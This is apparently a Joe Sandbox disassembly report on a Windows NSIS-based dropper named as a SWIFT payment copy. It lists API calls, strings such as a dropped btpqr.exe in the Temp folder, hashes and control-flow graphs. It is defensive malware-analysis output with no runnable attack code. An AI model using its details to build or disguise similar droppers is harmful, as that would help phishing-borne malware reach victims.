                                                                                                                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$pkfcbfzkpkrqtkjcmcyn Setup$~nsu
                                                                                                                        • API String ID: 1031542678-1672760224
                                                                                                                        • Opcode ID: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                        • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                                                        • Opcode Fuzzy Hash: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                        • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: first block 4054ec-405507
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                                                        • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040563E
                                                                                                                        • FindClose.KERNELBASE(?), ref: 0040564F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*$\*.*
                                                                                                                        • API String ID: 2035342205-1984511154
                                                                                                                        • Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                        • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                                                        • Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                        • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: first block 405ec2-405ed6
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNELBASE(?,0042C0F0,C:\,004057DE,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 2295610775-3404278061
                                                                                                                        • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                        • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                                                        • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                        • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 004039B0 (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                                                        • ShowWindow.USER32(?), ref: 00403A09
                                                                                                                        • DestroyWindow.USER32 ref: 00403A1D
                                                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403A5A
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403B23
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403B2D
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403C3E
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403CA9
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                                                        • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,pkfcbfzkpkrqtkjcmcyn Setup), ref: 00403CFD
                                                                                                                        • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                                                        Strings
                                                                                                                        • pkfcbfzkpkrqtkjcmcyn Setup, xrefs: 00403CEE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                        • String ID: pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 184305955-275725890
                                                                                                                        • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                        • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                                                        • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                                                        • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 0040361A (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000), ref: 0040368B
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403713
                                                                                                                        • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 0040371E
                                                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403767
                                                                                                                          • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                                                        • RegisterClassA.USER32 ref: 004037AE
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                                                        • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037FF
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
                                                                                                                        • RegisterClassA.USER32(0042E3C0), ref: 00403877
                                                                                                                        • DialogBoxParamA.USER32(?,00000000,004039B0,00000000), ref: 00403896
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$dk_
                                                                                                                        • API String ID: 1975747703-2632298905
                                                                                                                        • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                        • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                                                        • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                                                        • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 00402C55 (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,00000400), ref: 00402C82
                                                                                                                          • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 004058A2
                                                                                                                          • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00402CCE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$Ta_$soft
                                                                                                                        • API String ID: 4283519449-1504715776
                                                                                                                        • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                        • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                                                        • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                                                        • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 00402E8E (legend: Executed / Not Executed)
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                                                        • wsprintfA.USER32 ref: 00402FD5
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0041BA19,7FFFFFFF,00000000), ref: 00403003
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FileWritewsprintf
                                                                                                                        • String ID: ... %d%%$HLA$HLA
                                                                                                                        • API String ID: 4209647438-295942573
                                                                                                                        • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                        • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                                                        • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                                                        • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 505 401751-401774 call 402a29 call 405727 510 401776-40177c call 405bc7 505->510 511 40177e-401790 call 405bc7 call 4056ba lstrcatA 505->511 516 401795-40179b call 405e29 510->516 511->516 521 4017a0-4017a4 516->521 522 4017a6-4017b0 call 405ec2 521->522 523 4017d7-4017da 521->523 530 4017c2-4017d4 522->530 531 4017b2-4017c0 CompareFileTime 522->531 525 4017e2-4017fe call 40589e 523->525 526 4017dc-4017dd call 40587f 523->526 533 401800-401803 525->533 534 401876-40189f call 404eb3 call 402e8e 525->534 526->525 530->523 531->530 536 401805-401847 call 405bc7 * 2 call 405be9 call 405bc7 call 405488 533->536 537 401858-401862 call 404eb3 533->537 548 4018a1-4018a5 534->548 549 4018a7-4018b3 SetFileTime 534->549 536->521 569 40184d-40184e 536->569 546 40186b-401871 537->546 550 4028c7 546->550 548->549 552 4018b9-4018c4 FindCloseChangeNotification 548->552 549->552 553 4028c9-4028cd 550->553 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4018e2-4018e5 call 405be9 555->558 559 4018cf-4018e0 call 405be9 lstrcatA 555->559 556->550 563 4018ea-402246 call 405488 558->563 559->563 563->553 563->556 569->546 571 401850-401851 569->571 571->537
                                                                                                                        APIs
                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 00405BD4
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041BA19,755723A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041BA19,755723A0), ref: 00404F0F
                                                                                                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                          • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1941528284-152042057
                                                                                                                        • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                        • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                                                        • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                                                        • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 572 405375-4053c0 CreateDirectoryA 573 4053c2-4053c4 572->573 574 4053c6-4053d3 GetLastError 572->574 575 4053ed-4053ef 573->575 574->575 576 4053d5-4053e9 SetFileSecurityA 574->576 576->573 577 4053eb GetLastError 576->577 577->575
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                                                        • GetLastError.KERNEL32 ref: 004053CC
                                                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                                                        • GetLastError.KERNEL32 ref: 004053EB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                        • API String ID: 3449924974-1356718401
                                                                                                                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                                                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 578 405ee9-405f09 GetSystemDirectoryA 579 405f0b 578->579 580 405f0d-405f0f 578->580 579->580 581 405f11-405f19 580->581 582 405f1f-405f21 580->582 581->582 583 405f1b-405f1d 581->583 584 405f22-405f54 wsprintfA LoadLibraryExA 582->584 583->584
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                                                                                                                        • wsprintfA.USER32 ref: 00405F39
                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
